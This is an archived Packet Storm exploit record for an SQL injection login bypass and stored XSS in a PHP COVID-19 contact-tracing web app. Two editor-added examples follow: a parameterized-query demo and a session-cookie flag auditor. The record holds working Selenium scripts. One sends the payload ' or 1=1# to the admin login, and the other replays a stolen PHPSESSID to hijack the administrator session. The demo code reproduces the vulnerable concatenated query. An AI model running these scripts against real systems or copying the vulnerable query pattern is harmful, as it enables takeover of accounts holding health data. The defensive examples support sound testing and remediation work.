{"id": "PACKETSTORM:164005", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "COVID-19 Contact Tracing System With QR Code Scanning 1.0 SQL Injection", "description": "", "published": "2021-09-01T00:00:00", "modified": "2021-09-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164005/COVID-19-Contact-Tracing-System-With-QR-Code-Scanning-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-01T15:59:42", "viewCount": 184, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1678920471, "score": 1684008354, "epss": 1679109163}, "_internal": {"score_hash": "c4b08c94ef47b387163ea65cff5202bf"}, "sourceHref": "https://packetstormsecurity.com/files/download/164005/ctsqr10-sql.txt", "sourceData": "`### Exploit Title: Covid-19 Contact Tracing System Web App with QR Code Scanning CTS-QR (by: oretnom23 ) v1.0 remote SQL-Injection-Bypass-Authentication in /cts_qr/classes/Login.php + Stored XSS (vulnerable parameter \"code\" in the application's State/Province list) used to steal PHPSESSID. \n### Author: nu11secur1ty \n### Testing and Debugging: nu11secur1ty \n### Date: 09.01.2021 \n### Vendor: https://www.sourcecodester.com/user/257130/activity \n### Link: \nhttps://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html \n### CVE: CVE-nu11-04 \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# Debug and Development: @nu11secur1ty \n# CVE-nu11-04 \n \nfrom selenium import webdriver \nimport time \n \n \n#enter the link to the website you want to automate login. 
\nwebsite_link=\"http://localhost/cts_qr/admin/login.php\" \n \n#enter your login username (SQL injection payload: closes the quoted string, makes the WHERE clause always true, and comments out the rest of the query with MySQL's # comment marker) \nusername=\"nu11secur1ty' or 1=1#\" \n \n#enter your login password (the same payload is sent in the password field) \npassword=\"nu11secur1ty' or 1=1#\" \n \n#enter the element for username input field \nelement_for_username=\"username\" \n#enter the element for password input field \nelement_for_password=\"password\" \n \n# Selenium 4.3+ removed find_element_by_name(); locate the fields with By.NAME instead \nfrom selenium.webdriver.common.by import By \n \nbrowser = webdriver.Chrome() \nbrowser.get(website_link) \n \ntry: \n    username_element = browser.find_element(By.NAME, element_for_username) \n    username_element.send_keys(username) \n    password_element = browser.find_element(By.NAME, element_for_password) \n    password_element.send_keys(password) \n    browser.maximize_window() \n    time.sleep(1) \n    # submit the form by clicking the login button \n    browser.execute_script(\"document.querySelector('[class=\\\"btn btn-primary btn-block\\\"]').click()\") \n \n    print(\"The payload for CVE-nu11-04 is deployed...\\n\") \n \nexcept Exception: \n    #### This exception occurs if the elements are not found in the webpage. \n    print(\"Some error occurred :(\") \n \n \n[+] PWNED PHPSESSID \n \n#!/usr/bin/python \n# @nu11secur1ty \n# Replays a session identifier captured via the stored XSS: the value below is the stolen admin PHPSESSID \nimport time \nfrom selenium import webdriver \n \ndriver = webdriver.Chrome() \n \ndriver.maximize_window() \n# a page on the target origin must be loaded before add_cookie() accepts a cookie for it \ndriver.get(\"http://localhost/cts_qr/admin/login.php\") \ndriver.add_cookie({'name': 'PHPSESSID', 'value': '9flj0am7gv7cp3to8ujurvn1rs'}) \n \nprint(driver.get_cookie('PHPSESSID')) \n# reload with the injected cookie: the server now treats this browser as the hijacked session \ndriver.get(\"http://localhost/cts_qr/admin/login.php\") \n \ntime.sleep(3) \n \nprint(\"Your PHPSESSID is PWNED\") \n \n \n------------------------------------------------------------------ \n \n### Remote vulnerable link execution: \nhttp://localhost/cts_qr/admin/login.php \n \n### Description: \nThe Covid-19 Contact Tracing System CTS-QR (by: oretnom23 ) v1.0 is vulnerable to \nSQL-Injection-Bypass-Authentication in /cts_qr/classes/Login.php. \nMore info: \nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication. 
\n \nThe parameter (username) from the login form is not validated or escaped \nbefore it is placed in the SQL query, so a malicious payload reaches the \nMySQL server unchanged. A user who sends a crafted username such as \nnu11secur1ty' or 1=1# turns the WHERE clause into one that is always true \nand comments out the password check, bypasses the login credentials and \ntakes control of the administrator account. \n \n------------------------------------------------------------------ \n### Description PWNED PHPSESSID: \nOnce the malicious user controls the administrator account through the \nremote MySQL injection authentication bypass, \nhe can perform a stored XSS attack to steal PHPSESSID information and \nobtain another login with a separate tool, as the PWNED PHPSESSID script above does. \n- Conclusion: \nThis software must be DEPRECATED IMMEDIATELY!!! \n \n \n### Reproduce: \nhttps://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-04/XSS \n### Proof: https://streamable.com/luf1bw \n### BR nu11secur1ty \n`\n"}
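Worked example added by the editor, not code from the advisory above or from the CTS-QR project: it reproduces the authentication bypass the advisory describes (a username of nu11secur1ty' or 1=1#) against a constructed in-memory users table and shows the parameterized query that stops it. The table layout, the admin row and the query shape SELECT ... WHERE username = '...' AND password = '...' are assumptions standing in for /cts_qr/classes/Login.php, whose source the advisory does not reproduce. The demo runs on SQLite, so the executable payload uses SQLite's -- comment marker in place of MySQL's #; render_query shows the exact string a MySQL build would receive with the advisory's own payload.

```python
"""Added example (editor's code, not the advisory's or the CTS-QR project's).

Assumptions: a users(username, password) table and a login query built as
SELECT ... WHERE username = '<u>' AND password = '<p>'.  Data is constructed.
SQLite is used so the demo runs offline; its comment marker is '--', the
advisory's payload uses MySQL's '#'.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!pw')")
    return conn


def render_query(username: str, password: str) -> str:
    """The SQL string that string concatenation produces: user input becomes
    part of the statement, so a quote plus a comment marker rewrites it."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Concatenating pattern the advisory describes.  Returns the matched
    username (the first row once the WHERE clause is always true) or None."""
    row = conn.execute(render_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Same lookup with bound parameters: the payload is compared as data,
    never parsed as SQL, so the quote and comment marker have no effect."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# SQLite equivalent of the advisory's  nu11secur1ty' or 1=1#  payload
PAYLOAD = "nu11secur1ty' or 1=1-- "
# the advisory's MySQL payload, used only to render the query string
MYSQL_PAYLOAD = "nu11secur1ty' or 1=1#"

if __name__ == "__main__":
    conn = make_db()
    print("query MySQL would receive:", render_query(MYSQL_PAYLOAD, "x"))
    print("vulnerable login  ->", vulnerable_login(conn, PAYLOAD, PAYLOAD))  # admin
    print("parameterized     ->", safe_login(conn, PAYLOAD, PAYLOAD))        # None
    print("real credentials  ->", safe_login(conn, "admin", "S3cret!pw"))   # admin
```

The rendered MySQL string makes the mechanism visible: everything after # (the closing quote and the whole password comparison) is a comment, so the server evaluates username = 'nu11secur1ty' OR 1=1 and returns the first user, which in this application is the administrator.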
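A second added example (editor's code, not the advisory's or the project's): the check a tester runs on the login response's Set-Cookie header to see whether a PHPSESSID stolen through stored XSS, as the advisory describes, would even be readable from document.cookie, and whether the identifier is rotated at login so that a pre-login value cannot be replayed. The two Set-Cookie headers are constructed samples; nothing on the page says how CTS-QR configures its session cookie, and the hardened header assumes session.cookie_httponly, session.cookie_secure and session.cookie_samesite are set in php.ini or through session_set_cookie_params().

```python
"""Added example (editor's code, not from the advisory or CTS-QR).

Audits a session Set-Cookie header for the flags that blunt the PHPSESSID
theft and replay the advisory describes.  Sample headers are constructed.
"""


def parse_set_cookie(header: str):
    """Split a Set-Cookie header into (name, value, {attribute: value}).
    Attribute names are lower-cased; flag attributes without '=' map to True."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value.strip(), attrs


def audit_session_cookie(header: str):
    """Return the list of weaknesses in a session Set-Cookie header.

    HttpOnly is the one that matters for the advisory's scenario: without it,
    script injected via stored XSS reads the cookie from document.cookie."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append(
            "missing HttpOnly: document.cookie exposes %s to stored XSS" % name
        )
    if "secure" not in attrs:
        findings.append("missing Secure: cookie is also sent over plain HTTP")
    samesite = attrs.get("samesite")
    if samesite is None or samesite is True or str(samesite).lower() == "none":
        findings.append(
            "SameSite missing or None: cookie rides along on cross-site requests"
        )
    return findings


def session_rotated(before: str, after: str) -> bool:
    """True if the id issued after login differs from the pre-login one.
    PHP only does this when the application calls session_regenerate_id()."""
    return parse_set_cookie(before)[1] != parse_set_cookie(after)[1]


# constructed samples: PHP's default session cookie, and one with the flags set
WEAK = "PHPSESSID=9flj0am7gv7cp3to8ujurvn1rs; path=/"
HARDENED = "PHPSESSID=k2v8n1q0d7e5x3c9; path=/; Secure; HttpOnly; SameSite=Lax"

if __name__ == "__main__":
    for header in (WEAK, HARDENED):
        print(header)
        for finding in audit_session_cookie(header) or ["ok"]:
            print("   ", finding)
    print("session id rotated on login:", session_rotated(WEAK, HARDENED))
```

HttpOnly removes the document.cookie path the advisory relies on but not the injection itself; the stored XSS still runs in the administrator's browser and can issue requests with the session attached, so the flags are a containment measure, and the SQL injection and output encoding fixes remain the actual remediation.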